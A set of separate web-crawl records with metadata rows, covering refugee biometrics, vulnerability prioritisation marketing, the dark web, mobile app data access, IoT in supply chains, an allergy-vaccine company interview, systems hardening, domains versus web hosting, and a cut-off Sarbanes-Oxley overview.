With each iris scan stored on a form of the Ethereum blockchain, EyePay is also designed to eliminate millions of dollars in transaction fees associated with conventional money transfer services – “money,” MIT Tech Review reported in 2018, “that could have gone to millions of meals”. In time, hoped World Food Program (WFP) executive Houman Haddad, the scheme would allow refugees to open bank accounts and build new lives for themselves without recourse to the government documents of their country of origin.
How popular the system is among refugees themselves is another question. A report co-authored by Holloway found that only ten out of the 45 Syrian refugees interviewed preferred to receive cash payments through iris scanning. Another account from Dr Margie Cheesman, a digital anthropologist who visited Azraq before the pandemic, describes older refugees regularly frustrated at EyePay’s inability to recognise the irises of older individuals with eye problems like cataracts and fearful that the scans would ruin their health. “It’s all the time for the salary and the food and every time we want to buy bread too,” one woman told Cheesman. “My eyes burn after I scan them, it’s too much.”
Low levels of informed consent for iris scanning among migrants at Azraq is also alarming, says Dima Samaro, human rights researcher and an expert in the intersection of technology, human rights and migration. According to claims by Samaro, most of the refugees at Azraq submitting to iris scans do so under the assumption that refusing will prevent them from receiving basic aid, findings echoed by Molnar and Holloway in their own investigations. Effectively, says Samaro, “it’s forcing them to provide the consent in exchange for food and other basic services”.
Elsewhere, a memo published by UNHCR in April states that refugees in Jordan have their rights explained to them and that they can object to biometric data collection. While this objection ‘does not impact [their] status with UNHCR,’ its legitimacy is assessed by senior registration staff on a ‘case by case basis.’ While the classifiers collected are not shared with third parties so as to keep individual biometrics safe from misuse, ‘basic biodata’ like names and dates of registration are accessible to other humanitarian actors (such is the case with EyePay, said the UNHCR spokesperson.) However, Die Zeit reported in 2017 that the WFP was analysing purchase data from EyePay to check if refugees had a balanced diet. As such, says Samaro, “refugees find themselves in a position where they cannot defend themselves against the surveillance of their consumption habits”.
UNHCR is also obliged to share the biometric data it gathers in Jordan with the country’s government. That would be less controversial if national data protection regulations were not so weak. “There was a draft law that circulated last year, but it’s still a draft law, so it hasn’t been approved yet,” says Samaro. Even then, she adds, it failed to define biometric data under the law, let alone delineate when, if and how it should be collected.
The situation is markedly different in Europe and North America, where concerns revolve less around the lack of secure frameworks designed to keep biometrics safe than an escalation in the use of advanced technology to fortify borders against illegal immigrants. In the US, it was reported that ICE was using facial biometrics derived from selfies to monitor migrants inside its borders. Meanwhile, a pilot funded by the EU’s Horizon research and development fund named iBorderCtrl tested its own facial analysis system at airports in Latvia, Hungary and Greece from 2016-2019. Built to aid border officials in working out if travellers were lying about their identity or their ultimate destination. A similar system, named AVATAR, has also been tested at the US-Mexico border.
“This is such a clear example of playing around with really, really high-risk, experimental tools in these extremely high-risk areas that really don’t take into account the vast impacts that these [systems] have on people’s human rights, their dignity, and on their ability to present their story in a meaningful way,” says Molnar.
Critics would later argue that such systems ‘could be used to refuse entry or detain travellers based on race or ethnicity’ (emotion recognition technology, meanwhile, has since been criticised for its accuracy.) Molnar herself has previously campaigned against the increased securitisation of European borders as it relates to refugees and migrants, which has seen laws passed empowering police to seize and search their phones, snoop on social media accounts, and launch drones to monitor their movements from above. Earlier this year, the Belgian parliament also approved the creation of a biometric migrant database in the country, accessible to all EU member states.
“We really are dealing with a world that has become very sharp against people on the move,” she says. “It’s really become anti-migrant. All these different jurisdictions are criminalising movement, and they’re also, increasingly, doing it through these really problematic tools.”
Keeping biometrics safe and secure
Even so, the collection of biometric data is becoming increasingly normalised for all kinds of travellers: tourists entering the US, for example, know that their fingerprints are taken by border officials at the airport, while international adoption of biometric passports increases every year. Holloway, a US citizen, was subject to similar requirements when applying for her British visa.
“I willingly agreed to give [that data] because I wanted to move to the UK,” she says. “You could possibly say the same about people who are being displaced. [But] I wasn’t being pushed out of Alabama.”
It’s a crucial difference, say human rights activists. Driven out of their countries of origin, migrants should, in theory, be subject to the same duty of care reserved for similarly vulnerable populations. But while the biometric identifiers collected from legal travellers are often ring-fenced by reams of data protection laws – the security of which is inviolably linked to the reputation of the nation gathering that data – the frameworks governing such data collection among refugees beg to be tightened, argues Holloway.
What’s needed, says the researcher, are clear limits on what kinds of identifying data are collected from refugees in order to keep their biometrics safe from breaches or misuse. “If you're doing food distribution and you want to collect fingerprints so that you know that the person who registered originally is the one receiving the food, okay,” she says. “But do you need to link that fingerprint with gender? Do you need to link it with sexual identity? Do you need to link it with ethnicity or religion? All of these things, people can be persecuted for. The more that we can minimise collection of that kind of data, I think you minimise the overall risk of people then using that database to persecute based on that.”
This is not an unlikely scenario. Governments change all the time through elections, invasions and coups d’état, the data gathered by the previous regime suborned by the next. Such was the case in Afghanistan last year, when biometric records collected by ISAF since 2002 fell into the hands of the Taliban. A border incursion here, a data breach there, and data protection regimes designed to keep biometrics safe and secure can collapse overnight. “It doesn’t take that much effort to imagine how bad that situation could get for those people, just because they’ve had to give up that kind of information when they crossed the border,” says Holloway.
There has been an improvement in data protection standards among refugee agencies. Both the International Committee of the Red Cross and Oxfam have recently published their own guidelines on how they keep biometrics safe and secure, while the UNHCR has had its own policies in place for over a decade, notwithstanding its controversies around the informed consent of collection subjects. Even so, while those in the chain of command at refugee agencies and charities are aware of data protection frameworks, says Holloway, “the person who’s collecting the fingerprint on the ground is often not aware of the rest of the machinery”.
Critics might say that, for a system seemingly so full of risks, there have been comparatively few cases where the biometric data of refugees has been breached or used as a means to oppress minorities en masse. Molnar considers this thinking wrongheaded. While biometric data collection has its place in border control and the provision of key services to migrants, the stakes are simply too high for refugee agencies and governments to continue waiting for a serious incident to occur before tightening standards.
“At the end of the day,” says Molnar, “data collection cannot come at the expense of people’s human rights”. | <urn:uuid:06a263a4-fd67-49d2-9ae0-ec599245da37> | CC-MAIN-2024-38 | https://www.techmonitor.ai/policy/privacy-and-data-protection/biometrics-safe-data-protection | 2024-09-07T17:36:24Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00677.warc.gz | en | 0.9586 | 2,841 | 2.578125 | 3 |
There is a very simple reason that it’s so difficult to prevent zero-day attacks: By definition, zero-day attacks exploit zero-day vulnerabilities – flaws in software and hardware for which no patch has yet been released. In other words, a zero-day attack is a type of cyberattack that takes advantage of problems that have yet to be fixed.
As we explained in a recent post on the threat of zero-day attacks, zero-day vulnerabilities can include risks that developers and manufacturers have to discover, as well as vulnerabilities that have been discovered but for which developers have not yet produced a corrective patch.
Still, businesses and organizations can take steps to minimize the risk posed by unpatched vulnerabilities. In the case of zero-day vulnerabilities, the most effective line of defense is simply being diligent about general cybersecurity best practices, such as making sure to use unique passwords rather than recycling passwords across platforms. In the case of vulnerabilities for which patches have already been released, the most effective course of action is to install the patches as soon as possible.
Sounds like a straightforward solution, right? There’s just one reason that it’s not: The sheer volume of patches to be applied is far too great for most organizations. Applying these patches takes time and resources, and the rate at which vulnerabilities are discovered and publicized (along with their corresponding patches) is simply beyond the scope of what most organizations can handle as far as cybersecurity.
To stay safe both from zero-day attacks and from other types of cyberattacks, it is important to understand why it can be so difficult to keep up with necessary patches and what solutions are out there to help you identify and prioritize your most urgent cybersecurity vulnerabilities. With that in mind, this post will examine the challenge of using patches and other technologies to minimize the risk of falling victim to either a zero-day attack or a cyberattack that exploits a vulnerability for which a patch has already been released.
Why It’s So Important To Prioritize Vulnerabilities
The numbers show that the pace at which cybersecurity vulnerabilities are discovered is increasing over time. While each vulnerability is cause for concern, the good news is that patches are typically announced at the same time as the vulnerabilities they address. The problem is that organizations simply do not have the time or resources to install every patch. As a result, companies are at risk of falling victim not only to zero-day attacks, but also to attacks exploiting vulnerabilities for which they have not yet installed the necessary (and available) patches.
How widespread and alarming is this problem? In 2020, yet again, more cybersecurity vulnerabilities were discovered than the year before. Specifically, 18,353 new vulnerabilities were added to the National Vulnerability Database (NVD), including a record number of 4,381 high-severity vulnerabilities over the course of the year – an average of 12 every single day.
These unpatched vulnerabilities are one of the biggest sources of data breaches and other risks for companies and organizations. As of 2018, according to Ponemon, 60% of organizations that had suffered a data breach in the previous two years said the culprit was a known vulnerability for which they had not yet patched.
The real challenge here is the necessary patching. If this process were easier, by now vulnerabilities would have been relegated to a lower gear of security control, just like antivirus and other such measures. However, vulnerability patching is a complex process that is usually managed by teams outside of security organizations, and it is time-consuming. In fact, Ponemon has found that it takes an average of 12 days for teams to coordinate and apply a patch across all devices.
Why Effective Prioritization Is So Challenging – And How Cybersixgill Does It
There’s an open secret in the world of cybersecurity: Most of the prioritization of vulnerabilities is driven by CVSS scores. While these scores can evaluate the severity of a given vulnerability, they do not adequately factor in the question of how likely that vulnerability is to be exploited in the first place. Moreover, once a vulnerability is discovered, it typically takes between two and five days for it to be assigned a CVSS score. Not only does this system often result in outdated CVSS scores, but it can delay an organization’s response to a discovered vulnerability – even as attackers get to work trying to exploit that vulnerability.
The combination of stale CVSS scores and the wait for a score to be assigned leaves too many security teams with a limited understanding of their risk environment. Meanwhile, vulnerability overload adds to the challenge security teams face in prioritizing their remediation efforts. Consequently, approaches to cybersecurity tend to be more reactive than proactive and more tactical than strategic. In particular, it can be difficult to align organizational priorities with the threats posed by potential attackers.
To enable cybersecurity teams to prioritize patches as quickly and effectively as necessary, we at Cybersixgill have developed our Dynamic Vulnerability Exploit (DVE) Score, which predicts the probability of a CVE being exploited in the near future. The scoring system is dynamic, reflecting the likelihood that threat actors will take advantage of a given vulnerability in the next 90 days. This information then enables cybersecurity and IT teams to focus on the most pressing vulnerabilities.
The DVE Score actively incorporates attacker capability, intent, and interest in real time. And because this score takes a comprehensive and dynamic approach to evaluating vulnerabilities, companies and organizations can confidently make it a major factor they use when deciding which patches to apply and in what order.
By tapping into the dark web’s value as a source of cyberthreat intel, the Cybersixgill DVE Score takes into account footprints that bad actors often leave behind as they communicate about their plans in underground forums. Because the dark web is where threat actors go to communicate online when they want to stay anonymous, it is often the first place where evidence of a future cyberattack appears. And, with the world’s largest data lake of information from the dark web, Cybersixgill is uniquely capable of finding and utilizing this type of intelligence.
How does all of this help companies and organizations stay safe in light of the reality that zero-day attacks are not the only type of cyberthreat they face? It empowers them with the information they need to make well-informed decisions about which patches to implement first. Although the Cybersixgill DVE Score does not in itself eliminate the vulnerabilities these organizations face, it gives them the threat intelligence they need to set their cybersecurity priorities effectively in light of the latest online discourse.
This way, cybersecurity and IT professionals can rest assured that they have the insights they need to keep up with whichever patches are the most urgent at any given time.
How can the Cybersixgill Dynamic Vulnerability Exploit (DVE) Score help you pinpoint the most urgent patches to protect your company or organization? To see for yourself, request a demo. | <urn:uuid:d64c61c8-adfc-48b5-966c-1db7ec4f49b6> | CC-MAIN-2024-38 | https://cybersixgill.com/news/articles/what-you-need-to-know-about-preventing-zero-day-attacks | 2024-09-11T10:57:57Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651383.5/warc/CC-MAIN-20240911084051-20240911114051-00377.warc.gz | en | 0.965035 | 1,416 | 2.625 | 3 |
Is Your Info on the Dark Web?
Many people have heard or read about the “dark web”. It’s an ominous phrase that sparks fear about stolen identities and illegal activity, but what actually is the dark web? The dark web is the parts of the Internet that are not indexed by search engines.
Google, Bing, DuckDuckGo and other search engines index the websites you’re used to using, which is what makes it easy for folks to find them on their phones and computer. However, the dark web is full of websites that you can’t reach from Google or Bing, because they are controlled by people who do not want them found. They are not always hidden for nefarious purposes. Some dark web users are hiding information from totalitarian governments, for example. However, many people who do have malicious intentions use the dark web to hide their illegal activity.
What Is the Dark Web?
The dark web is often where user data stolen from companies ends up thanks to massive data breaches that IT network security services experts failed to stop.
Data Stolen and Sold
User data found on the dark web ranges from things such as names and addresses to credit card numbers to even social security numbers in the worst cases. Data like this is often sold by hackers to criminals who use it for identity theft. While malevolent actors are trying to steal data from innocent people all the time, fortunately, IT network security services prevent the majority of attacks from succeeding.
Still, we all hear the news and we know how many times hackers have exposed sensitive data over the past few years. With many of us having our data made vulnerable due to these breaches, it is very much worth asking if our information is on the dark web.
Ways to Protect Yourself
There are ways to guard yourself against your information getting out on the dark web. There are also ways to manage or handle it even if your information is caught up in a major data breach. If you’re a company that’s storing sensitive data, make sure you have IT network security services that take a proactive approach and are constantly checking your systems for vulnerabilities that hackers might exploit.
Your cybersecurity processes should not be waiting for a breach to happen to seal up the cracks. Individuals can also invest in personal cybersecurity and credit monitoring services. Many of these services will monitor the dark web and inform you if any of your sensitive information is spotted there, allowing you to take the necessary steps to fix the problem.
If your data is found on the dark web, changing your passwords, freezing your credit cards and even cancelling accounts in the direst situations are all things you can do to prevent any serious damage from occurring.
Talk to Experts on IT Network Security Services
It’s more than reasonable to be concerned about your information being in the hands of people with less-than-benevolent intentions. The reality of the situations is that we’ve seen numerous major data breaches exposing billions of instances of user data, and a much of that information has unfortunately spread its way to the dark web.
If you want to talk to experts about your IT network security services, contact FullScope IT today and find out what you can do to stop your sensitive information from ending up where it doesn’t belong. | <urn:uuid:0cd30143-2496-4402-ac7b-9b92417b17b5> | CC-MAIN-2024-38 | https://fullscopeit.com/2021/02/is-your-info-on-the-dark-web/ | 2024-09-12T16:00:45Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00277.warc.gz | en | 0.949838 | 672 | 2.6875 | 3 |
The App Genome Project
Lookout unveiled the App Genome Project, which is the largest mobile application dataset ever created. In an ongoing effort to map and study mobile applications, the App Genome Project was created to identify security threats in the wild and provide insight into how applications are accessing personal data, as well as other phone resources. Lookout founders John Hering and Kevin Mahaffey initiated the App Genome project to understand what mobile applications are doing and use that information to more quickly identify potential security threats.
Early findings show differences in the sensitive data that is being accessed by Android and iPhone applications, as well as a proliferation of third party code in applications across both platforms. Stats include:
- 29% of free applications on Android have the capability to access a user’s location, compared with 33% of free applications on iPhone
- Nearly twice as many free applications have the capability to access user’s contact data on iPhone (14%) as compared to Android (8%)
- 47% of free Android apps include third party code, while that number is 23% on iPhone*
* Examples of third party code includes code that enables mobile ads to be served and analytic tracking for developers.
New Security Vulnerabilities
Lookout will also be announcing new security vulnerabilities including Mobile Data Leakage, which occurs when developers inadvertently expose sensitive data in application logs in a way that makes it accessible to malicious applications. In one instance of this vulnerability, Android was releasing user location data into logs in a way that made it accessible to other applications. That vulnerability has been addressed by Google and is fixed in all versions of Android, v.2.2 and beyond. This vulnerability and others point to the need for developers to be more aware of best practices for accessing, transmitting and storing users’ personal data. In addition, consumers need to be aware of the permissions that mobile applications request and how that personal data is being used in the application.
Book a personalized, no-pressure demo today to learn:
Discover how adversaries use non-traditional methods for phishing on iOS/Android, see real-world examples of threats, and learn how an integrated security platform safeguards your organization. | <urn:uuid:1c2962ce-179e-4f74-ba96-130c5896a35c> | CC-MAIN-2024-38 | https://www.lookout.com/blog/introducing-the-app-genome-project | 2024-09-12T14:33:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00277.warc.gz | en | 0.943267 | 446 | 2.75 | 3 |
The internet of things (IOT) is the network of physical objects that are connected to the internet, or are capable of being connected to the internet. These objects can include everything from sensors to smart appliances, and they can be used for a variety of purposes, such as monitoring environmental conditions, tracking asset inventory, and automating processes.
In this article, we’ll take a look at some of the key benefits of deploying IOT solutions in your business, and discuss some of the challenges that you’ll need to address if you want to get started. We’ll also provide a primer on some of the most popular IOT technologies, so that you have a better understanding of what’s out there and how you can use it to your advantage.
IOT: What it is?
IOT is short for “Internet of Things.” This technology refers to devices and systems that are connected to the internet, whether through wired or wireless networks. IOT devices can include everything from smart home devices to cars. IOT can help us improve our lives in many ways, including by making our lives more efficient and helping us save money.
How IOT is Used?
In recent years, the Internet of Things (IoT) has become a popular topic for discussion. Because IoT is a network of devices that are connected to the internet, it has the potential to change many aspects of our lives. IoT is used in a variety of ways, including in manufacturing and agriculture. In this blog post, we will discuss some of the ways in which IoT is being used.
One way that IoT is being used is in manufacturing. By using sensors to track data such as temperature, humidity, and air quality, manufacturers can improve their production processes. For example, by tracking the temperature of a car engine, automakers can reduce the amount of heat that needs to be applied, which can lead to improved performance and fuel efficiency. Additionally, by monitoring the humidity levels in a factory, companies can reduce the amount of moisture that collects on equipment and surfaces. This can lead to reduced downtime and improved production rates.
Another area where IoT is being used is in agriculture. By using smart irrigation systems, farmers can monitor crop output and water usage more accurately than ever before. Additionally, by using drones to monitor livestock conditions, farmers can ensure that their animals are
How the Internet of Things Is Transforming Supply Chain Management
The Internet of Things is changing the way businesses operate by increasing efficiency and reducing costs. With devices embedded in everything from cars to factories, IoT is transforming how we collect data and make decisions. Here are five ways the IoT is changing supply chain management:
- Increased Efficiency: The IoT allows businesses to collect data from devices throughout the supply chain in real-time, which can help identify problems early and optimize production accordingly. By reducing the time it takes to gather information, businesses can improve overall efficiency and cut costs.
- Enhanced Customer Experience: By tracking inventory and deliveries, businesses can ensure that customers receive products on time and in the correct condition. This enhanced customer experience can also reduce customer dissatisfaction and increase loyalty rates.
- Reduced Down Time: By monitoring plants and equipment remotely, businesses can detect issues before they become major problems. By responding quickly, businesses can avoid costly downtime and reduce stress on personnel.
- Improved Safety: The IoT can help identify dangerous conditions before they cause injury or damage. By taking preventative measures early, businesses can prevent injuries and save money on repairs later on.
- Increased Knowledge: The IoT allows businesses to collect data on a large scale,
Why using IoT in supply chain management
In today’s world, every business strives to be as efficient and effective as possible. One way in which businesses can achieve this is by using IoT technology in their supply chains. By integrating IoT devices into the process of production, businesses can improve their overall efficiency and accuracy. Additionally, by understanding how consumers interact with the products they purchase, businesses can develop more tailored products that meet the needs of their customers.
Below are a few reasons why businesses should consider incorporating IoT into their supply chains:
1) Increased Efficiency: By connecting sensors and devices to the production process, businesses can improve their overall efficiency. This is due to the fact that sensors will automatically detect issues and problems that may occur during production, and then provide solutions in order to rectify them. In addition, by collecting data from all of the devices involved in production, businesses can better understand consumer behavior and patterns. This information can then be used to improve customer service or develop new marketing strategies.
2) Improved Accuracy: By integrating IoT devices into the process of production, businesses can improve accuracy when it comes to manufacturing products. For example, if a product’s dimensions are incorrect, a sensor will detect this and provide appropriate corrective action.
Benefits of IOT
IOT is already being used by many businesses and organizations for a variety of purposes, including smart cities, healthcare, automotive, and more. Here are some of the benefits of IOT:
- Smart Cities: IOT can help cities become more efficient and connected, making them more resilient in the face of disasters. For example, when a city detects a fire, IOT can automatically send alerts to firefighters.
- Healthcare: IOT can help hospitals monitor patients’ health better by tracking their vital signs, medications, and more. This data can be used to improve patient care and make better decisions about treatments.
- Autonomous Vehicles: IOT can help make autonomous vehicles safer by helping drivers avoid accidents. For example, if a driver sensors an accident ahead, IOT can warn them and take control of the car.
Comprehension of IoT
IoT (Internet of Things) is a network of physical devices and software that allow objects to be interconnected and monitored. IoT is the latest phase in the evolution of the internet, which began in the 1990s as a way to connect universities and businesses. Today, IoT enables objects like cars, appliances, toys and home security systems to be connected to the internet. This makes them easier to manage and control, and opens up new possibilities for applications such as smart cities and supply chain management.
Problems with IOT
IOT is a term for the internet of things, which refers to the proliferation of devices connected to the internet. IOT has the potential to change our world in many ways, but it also has some big problems that need to be addressed. Here are four of the biggest:
- Security: IOT devices are vulnerable to hacking and other forms of cybercrime.
- Data collection: IOT devices collect a lot of data about what we do and how we live. This data can be used for surveillance and marketing purposes.
- Interoperability: IOT devices don’t always work together, so it’s difficult to use them in coordinated ways.
- Cost: IOT is expensive to build and operate, and it often doesn’t deliver on its promises.
In this rapidly changing world, there are many new and innovative technologies that are shaking up the way we live our lives. One of these technologies is IoT (Internet of Things), which is making it possible for devices to interact with each other in remote and complex ways. As we begin to see more and more devices connected to the internet, there is a growing demand for solutions that can help us manage and monitor these devices. In this article, I’ve outlined some of the best tools available for managing and monitoring your IoT assets. So whether you’re looking to deploy an automation solution or just want to make sure your devices are staying safe and secure, keep reading for some great resources! | <urn:uuid:ecb8d036-0f1a-41e7-ae34-5378d8e29f1f> | CC-MAIN-2024-38 | https://cybersguards.com/iot-supply-chain/ | 2024-09-16T07:17:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00877.warc.gz | en | 0.951423 | 1,578 | 2.8125 | 3 |
Allergic diseases are one of the most common chronic health conditions globally. People with a family history of allergies have an increased risk of developing allergic disease. Allergy symptoms can range from mild to severe, life-threatening allergic reactions (anaphylaxis).
Over the last decades, allergic disorders, such as rhinitis and asthma, have increased worldwide, mostly in westernized countries where up to 20-% of the population is affected. The “hygiene hypothesis” suggests that modernized lifestyles like improved housing conditions, altered dietary habits, and smaller family sizes may be responsible for the decrease in infectious and increased allergic diseases.
According to the leading experts in immunology, an allergic reaction begins in the immune system. Our immune system protects us from invading organisms that can cause illness and reacts to otherwise harmless substances mistaking it for an invader. The invading substance is called an allergen. The immune system overreacts to the allergen by producing Immunoglobulin E (IgE) antibodies. These antibodies travel to cells that release histamine and other chemicals, causing a myriad of allergic reactions.
Allergen immunotherapy is the only treatment in current use with the potential for modifying the course of allergic disease. Inmunotek is a pharmaceutical laboratory based in Madrid, Spain, that since 1992, researches, develops, manufactures, and markets safe and effective therapeutic vaccines in allergy, infectious diseases, and cancer. Its products are sold in Spain and many other countries through subsidiaries, delegations, and exclusive distributors.
Following excerpts are taken from the conversation with José Luis Subiza, President & CEO of Inmunotek
Q. What is the challenging aspect of starting a pharmaceutical company?
The challenges of starting a pharmaceutical company are many and varied. In addition to financial support and regulatory assistance, there is a need to be clear about the objectives and the necessary steps in the early stages. The business plan needs to be validated by different experts. Beign an expert immunologist allows me to have a clear vision of the possibilities for new products in Inmunotek’s target area.
Tell us about your expertise in manufacturing and marketing products.
At Inmunotek, we develop, manufacture and market our own products. As these are vaccines, they are products of a biological nature. The manufacturing process includes the entire value chain, from processing the raw materials through the intermediate products to the finished product. Much of the raw material comes from our own facilities or companies in our group.
Our entire manufacturing process complies with the stringent quality standards (GMP) required to manufacture medicines. Inmunotek products are marketed in more than 30 countries, on five continents, directly through subsidiaries or local distributors.
Q. How consistent are you in creating innovative and competitive products of the highest quality?
Inmunotek is a fast-growing pharmaceutical firm listed in the FT1000 (Financial Times) because of our innovative and competitive products.
Over time, we have received many awards that recognize our commitment to innovation and motivate us to continue our pursuit of excellence. Among them is the National Innovation Award granted by the Ministry of Science and Innovation, the highest recognition of the Spanish Government.
Q. What makes the company stand out from the competition?
In the field of allergy and immunology, Inmunotek offers a broad portfolio of products for diagnosis and treatment. Allergy vaccines can be customized to suit patients’ needs, allowing a broad spectrum of therapeutic possibilities to be covered. The customization includes a variety of routes of administration covering different dosage forms in which the company is a pioneer. In the field of infections, Inmunotek has developed new mucosal vaccines to prevent recurrent upper respiratory tract and urinary tract infections, particularly recurrent bladder infections.
Q. What makes this place a great place to work?
The innovative character of Inmunotek, its continuous expansion, and, most importantly, its ability to improve the quality of life of thousands of patients worldwide are inspiring qualities of the company.
Inmunotek has grown a lot in recent years but still retains the best advantages of a small company—a company where all ideas are heard. We have a great multidisciplinary team with high growth opportunities within the company.
In recognition of Inmunotek’s economic growth, innovation capacity, employment generation, and internationalization, the firm was awarded the SME (small-medium enterprise) of the year (2019) by the most important business organization in Spain.
Q. What is the company’s strength, and how did you utilize it for the best?
Since 1992, we have been looking for solutions to unmet needs in our activity area with a multidisciplinary approach. Our motto is to innovate and share ideas. We make an open and collaborative innovation firmly based on scientific evidence. Our driving force is to obtain better treatments that improve patients’ quality of life.
The visionary and inspirational man behind the success of Inmunotek
José Luis Subiza, MD, Ph.D., is an expert in Immunology with a long experience in research in different fields, particularly in therapeutic vaccines for allergies, recurrent infections, and cancer.
He studied medicine at the Complutense University of Madrid and did his doctorate in tumor immunology.
Dr. Subiza has been Professor of Immunology at the Faculty of Medicine of the Complutense University of Madrid and Head of the Department of Immunology at the University Hospital San Carlos in Madrid.
He founded Inmunotek in 1992 and is currently the firm’s president and CEO. | <urn:uuid:fb8a15d8-7b64-4b9e-88c4-1d247db8a105> | CC-MAIN-2024-38 | https://www.ciobulletin.com/magazine/inmunotek-offers-innovative-and-competitive-allergy-and-immunology-products | 2024-09-16T05:34:13Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00877.warc.gz | en | 0.943949 | 1,146 | 2.609375 | 3 |
What do cyber-criminals do when they need more computing power? They steal it, of course, and something connected to your network could be captured and enslaved in a global botnet army if you haven’t hardened your systems. This is what occurred in 2016 when a huge Denial of Service attack targeted high profile websites and hosting providers.* Here’s how it happens.
A cyber-criminal searches the internet for devices that have weak, default or no passwords or other holes that can be exploited. When they find an open door, they confiscate the computing power and turn it in the direction they want it to go. The owner of the device is none the wiser unless they are closely monitoring their network and notice a huge spike in outbound traffic.
Security cameras and other Internet of Things (IoT) devices have been favorite targets for takeover because their security has largely been neglected. However, any hardware or software can have potential unlocked doors where hackers can enter to not just create botnets, but cause havoc to your business by downloading ransomware or gathering intelligence for high stakes phishing campaigns.
Ready for some good news? You can lock these entry ways down with systems hardening. Systems hardening is, in fact, a practice that should be applied to just about anything connected to your network, from your printers, phones and cameras, to your servers, operating systems, firewalls and databases.
Turn It Off or Lock It Down
Systems hardening is simply turning off hardware and software functions that you’re not using, and utilizing good password management to control access to accounts and data. Some of the tactics included in systems hardening are:
- Changing default passwords
- Utilizing multi-factor authentication (MFA)
- Deleting unused accounts
- Managing user access with least privilege
- Disabling unused software features
- Disabling unused operating system features
- Turning on security features
- Patching and updating software
The difficulty with systems hardening generally comes from a lack of knowledge about how to configure hardware and software for maximum security. You have to know what to secure and how to secure it. Even with popular software like Microsoft, it takes expertise to know where all the settings are and then how best to utilize them.
Systems Hardening Reduces Potential Attack Surface
Systems hardening is a layer of your security strategy that reduces cyber risk by decreasing the possible entryways to your network. Its use is interwoven with other tactics in your security strategy that together allow you to stand up a strong defense to increasing cyber threats.
Discover Unlocked Doors with a Cybersecurity Assessment
You can ask your IT team if they’re utilizing systems hardening in your cybersecurity strategy. Or you could schedule a cybersecurity assessment and get an objective view of your security posture. Do it today and stop wondering. | <urn:uuid:3f4dd077-0bd8-4f4c-b3ba-72db301c939b> | CC-MAIN-2024-38 | https://www.belltec.com/2022/05/cybersecurity-beyond-the-basics-systems-hardening/ | 2024-09-17T13:02:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00777.warc.gz | en | 0.920011 | 582 | 2.640625 | 3 |
Our readers frequently ask us to explain the distinction between a domain name and web hosting. Many beginners are unaware that these are two distinct concepts.
What exactly is a domain name?
A domain name is the address of your website that visitors type into their browser’s URL bar to visit.
To put it another way, if your website were a house, your domain name would be its address.
Web hosting is the location where all of your website’s files are stored. It is similar to your website’s actual residence.
If your domain name is the address of your house, then web hosting is the actual house to which that address points.
Web hosting is required for all websites on the internet.
When someone enters your domain name into a browser, it is translated into the IP address of the computer at your hosting company.
This computer stores your website’s files and sends them to the users’ browsers.
Web hosting companies specialize in the storage and delivery of websites. Customers can choose from a variety of hosting plans. To learn more about choosing the right hosting for your website, read our article on WordPress hosting.
What is the relationship between domain names and web hosting?
Domain names and web hosting are not the same thing. They do, however, collaborate to make websites possible.
A domain name system is essentially a massive address book that is constantly updated. Each domain contains the address of the web hosting service that stores the website’s files.
People cannot find your website without domain names, and you cannot build a website without web hosting.
What do I require to create a website? Do I need a domain name or web hosting?
A domain name and a web hosting account are required to create a website.
Purchasing a domain name only grants you the right to use that domain name for a limited time (usually one year).
Web hosting is required to store the files on your website. You must update your domain name settings and point it to your hosting service provider once you have obtained hosting.
Do I have to buy them all at once? Can I get them separately?
You can purchase a domain name and web hosting from two separate companies. In that case, you must point your domain name to your hosting provider by editing its DNS settings.
If, on the other hand, you get your domain name and web hosting from the same company, you won’t have to change your domain settings. | <urn:uuid:7b631dd8-b300-46ff-bcb2-7187da71fc25> | CC-MAIN-2024-38 | https://fbrandhosting.com/2023/02/17/what-is-the-distinction-between-a-domain-name-and-web-hosting-explained/ | 2024-09-18T18:56:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651931.60/warc/CC-MAIN-20240918165253-20240918195253-00677.warc.gz | en | 0.942473 | 508 | 2.75 | 3 |
Implemented as a result of corporate financial scandals, the act made sweeping changes to federal securities law and corporate accountability.
The Sarbanes-Oxley Act (SOX) was signed into law on July 30, 2002. The Act specifies financial reporting responsibilities, as well as required internal controls and procedures designed to ensure the validity of financial records and protect against disclosure of confidential information. The Sarbanes-Oxley act also created new standards for corporate accountability, new penalties for acts of wrongdoing, and protection of “whistleblowers” against unlawful retaliation.
All publicly-traded companies in the U.S. (including wholly owned subsidiaries), all publicly-traded companies doing business in the U.S., as well as accounting firms providing auditing services to them must maintain Sarbanes-Oxley compliance
All publicly-traded companies in the U.S. (including wholly owned subsidiaries), all publicly-traded companies doing business in the U.S., as well as accounting firms providing auditing services to them must maintain Sarbanes-Oxley compliance. However, many private and nonprofit companies are facing market pressures to confirm to SOX standards. Privately held companies that fail to adopt SOX-type standards to protect information may face higher insurance premiums, have difficulty raising capital, and lose customers to other companies that adhere to the compliance standards. 1
The Sarbanes-Oxley Act is arranged into 11 “Titles”. With regards to compliance, the most important sections within the 11 titles are:
Section 302 – Corporate responsibility for financial reports. Intended to safeguard against faulty financial reporting. As part of this section, companies must safeguard their data to ensure financial reports are not based upon faulty data or data that has been tampered with.
Important subsections include:
Section 302.2 – Establish safeguards to prevent data tampering.Requires the signing officer to attest to the validity of reported information. Data must be verifiably true, requiring safeguards to prevent data tampering.
Section 302.3 – Establish safeguards to establish timelines.Requires the signing officer to attest reported information is fairly presented, including accurate reporting for the time periods. Safeguards must ensure data relates to a verifiable time period.
Section 302.4.B – Establish verifiable controls to track data access.Requires internal controls over data, so that officers are aware of all relevant data for reporting purposes. Data must exist in a verifiably secure framework which is internally controlled.
Section 302.4.D – Periodically report the effectiveness of safeguards.Requires a report on the effectiveness of the security system. The security framework should report its effectiveness to officers and auditors.
